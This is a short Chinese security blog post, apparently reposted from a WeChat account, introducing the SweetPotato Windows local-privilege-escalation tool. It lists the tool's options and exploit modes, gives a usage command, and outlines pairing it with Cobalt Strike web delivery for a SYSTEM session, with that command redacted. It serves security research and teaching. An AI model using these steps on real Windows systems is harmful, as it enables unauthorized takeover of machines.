基本介绍
从Windows 7到Windows 10 / Server 2019的本地服务到系统权限提升漏洞,也是土豆家族的有一个提权漏洞
项目地址
https://github.com/CCob/SweetPotato
SweetPotato by
Orignal RottenPotato code and exploit by
Weaponized JuciyPotato by and along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by
EfsRpc built on EfsPotato by and PetitPotam by
-c, --clsid=VALUE CLSID (default BITS:
4991D34B-80A1-4291-83B6-3328366B9097)
-m, --method=VALUE Auto,User,Thread (default Auto)
-p, --prog=VALUE Program to launch (default cmd.exe)
-a, --args=VALUE Arguments for program (default null)
-e, --exploit=VALUE Exploit mode
[DCOM|WinRM|EfsRpc|PrintSpoofer(default)]
-l, --listenPort=VALUE COM server listen port (default 6666)
-h, --help Display this help
使用方法
SweetPotato.exe -a "whoami"
再使用过程中可以自定义 clsid 与端口,--help或者 - h查看帮助
同时可以对SweetPotato进行修改,使其可以直接上线一个system的session,效果图如下所示:
Step 1: 使用cs启动一个web攻击的简体
Step 2: 执行以下命令
www.xxx.com/xxx.xxx
文末小结
后续将会继续给出一些土豆家族的提权漏洞的使用方法,敬请期待~
原文始发于微信公众号(七芒星实验室):Windows提权之SweetPotato
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论